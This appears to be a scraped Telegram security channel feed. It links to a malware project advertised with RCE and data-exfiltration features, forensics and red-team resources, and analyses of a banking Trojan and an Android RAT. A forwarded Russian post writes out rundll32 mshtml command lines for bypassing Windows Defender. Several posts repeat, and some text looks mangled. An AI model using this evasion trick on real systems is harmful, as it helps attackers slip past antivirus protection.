An experimental, in-development, malicious software with RCE, and Data Exfiltration capabilities as a core.
Link
#malware_dev
———
@islemolecule_source
Link
#malware_dev
———
@islemolecule_source
👍4🔥1
👍4
Windows Process Internals : A few Concepts to know before jumping on Memory Forensics
credit : Kirtar Oza
https://web.archive.org/web/20201117183039/https://eforensicsmag.com/windows-process-internals-a-few-concepts-to-know-before-jumping-on-memory-forensics-by-kirtar-oza/
#windows_internls . #memory_forensics
———
@islemolecule_source
credit : Kirtar Oza
https://web.archive.org/web/20201117183039/https://eforensicsmag.com/windows-process-internals-a-few-concepts-to-know-before-jumping-on-memory-forensics-by-kirtar-oza/
#windows_internls . #memory_forensics
———
@islemolecule_source
👍3
🤩2❤1
Red team road map
Intern / junior / medium / senior
Red team needed concepts
Credit : Sohiel Hashemi
https://xmind.app/m/9Zcnkq
#red_team ,
———
@islemolecule_source
Intern / junior / medium / senior
Red team needed concepts
Credit : Sohiel Hashemi
https://xmind.app/m/9Zcnkq
#red_team ,
———
@islemolecule_source
😁6🎃4❤1👍1
Coyote: A multi-stage banking Trojan abusing the Squirrel installer
Link
#malware_analysis
———
@islemolecule_source
Link
#malware_analysis
———
@islemolecule_source
👍8
Reverse engineering of Android Phoenix RAT
Analysis: link
Phoenix overview: link
#malware_analysis
———
@islemolecule_source
Analysis: link
Phoenix overview: link
#malware_analysis
———
@islemolecule_source
Medium
Reverse engineering of Android/Phoenix
Android/Phoenix is a malicious Remote Access Tool. Its main goal is to extensively spy on the victim’s phone (grab all screenshots, steal…
Forwarded from Proxy Bar
Windows Defender Detection Mitigation Bypass Vulnerability
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти
*
то есть было и пофиксили:
магия запятой:
собака старая, трюки новые.
CVE пока не имеет )
#defender #bypass
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти
windows defender передав дополнительный путь при ссылке на mshtml, дырку пофиксили. НО, добавив пару запятых в старый трюк - и опять bypass. *
то есть было и пофиксили:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,RunHTMLApplication ";alert(666)магия запятой:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)собака старая, трюки новые.
CVE пока не имеет )
#defender #bypass
👍4